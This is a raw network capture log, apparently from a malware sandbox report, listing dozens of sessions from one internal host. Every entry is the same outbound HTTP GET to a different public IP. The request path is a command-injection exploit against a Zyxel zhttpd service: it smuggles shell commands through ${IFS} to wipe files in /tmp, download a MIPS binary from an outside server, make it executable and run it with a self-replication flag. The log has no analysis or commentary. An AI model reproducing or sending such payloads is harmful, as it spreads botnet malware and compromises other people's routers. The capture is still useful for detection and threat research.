                                                Jan 12, 2024 18:16:29.605521917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6080192.168.2.2341840100.17.13.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605557919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6081192.168.2.235289669.136.141.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605597973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6082192.168.2.234122846.212.115.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605635881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6083192.168.2.2356164167.138.186.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605688095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6084192.168.2.23479621.27.56.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605710983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6085192.168.2.234704857.118.215.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605761051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6086192.168.2.235416046.194.121.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605788946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6087192.168.2.23595141.160.97.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605829954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6088192.168.2.2337872145.168.96.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605879068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6089192.168.2.2333914148.46.49.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605912924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6090192.168.2.2336272115.76.231.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605935097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6091192.168.2.2338106109.98.64.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606007099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6092192.168.2.23444924.127.35.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606070042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6093192.168.2.23348504.210.49.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606100082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6094192.168.2.233283884.158.176.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606141090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6095192.168.2.233682623.94.157.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606174946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6096192.168.2.2356688137.30.183.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606228113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6097192.168.2.235310285.171.159.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606280088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6098192.168.2.2344528179.108.142.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606302023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6099192.168.2.2346832163.255.149.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606352091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6100192.168.2.2344106209.148.30.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606390953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6101192.168.2.2335906130.249.118.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606462002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6102192.168.2.234782245.103.27.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606483936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6103192.168.2.2343382188.14.102.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606529951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6104192.168.2.2357152161.4.239.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606578112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6105192.168.2.235141497.4.153.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606602907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6106192.168.2.2359594146.181.150.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606654882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6107192.168.2.233646242.89.105.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606699944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6108192.168.2.2342564143.27.157.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606739998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6109192.168.2.234007476.150.232.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606796980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6110192.168.2.2347112206.155.251.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606816053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6111192.168.2.2360456171.212.214.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606878996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6112192.168.2.23330329.226.248.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606903076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6113192.168.2.2345914157.86.140.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606939077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6114192.168.2.2342870131.94.14.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.606977940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6115192.168.2.2340602108.34.1.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607019901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6116192.168.2.233916650.147.72.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607074022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6117192.168.2.2340072101.69.253.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607103109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6118192.168.2.233403634.112.69.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607139111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6119192.168.2.2345444174.134.27.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607182980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6120192.168.2.2357296125.240.222.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607228994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6121192.168.2.2348108220.122.234.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607254982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6122192.168.2.2333474126.23.97.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607299089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6123192.168.2.23556849.250.66.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607347012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6124192.168.2.233922046.20.56.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607389927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6125192.168.2.23515741.136.13.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607419968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6126192.168.2.2349806141.89.206.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607459068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6127192.168.2.2339438106.255.164.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607475996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6128192.168.2.234268696.196.156.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607522964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6129192.168.2.235255653.177.116.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607570887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6130192.168.2.2347808145.250.69.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607608080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6131192.168.2.233860679.54.85.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607640982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6132192.168.2.235695888.239.179.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607681990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6133192.168.2.2359916172.176.1.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607748032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6134192.168.2.2353732103.22.105.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607777119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6135192.168.2.235217677.107.25.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607825994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6136192.168.2.2355642121.102.20.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607866049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6137192.168.2.2334800114.44.37.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607911110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6138192.168.2.2341982100.143.92.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.607954025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6139192.168.2.235669645.107.166.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608002901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6140192.168.2.2353152199.188.253.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608071089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6141192.168.2.2358760126.61.185.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.608088017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6142192.168.2.2339806150.21.22.8443
                                                TimestampBytes transferredDirectionData
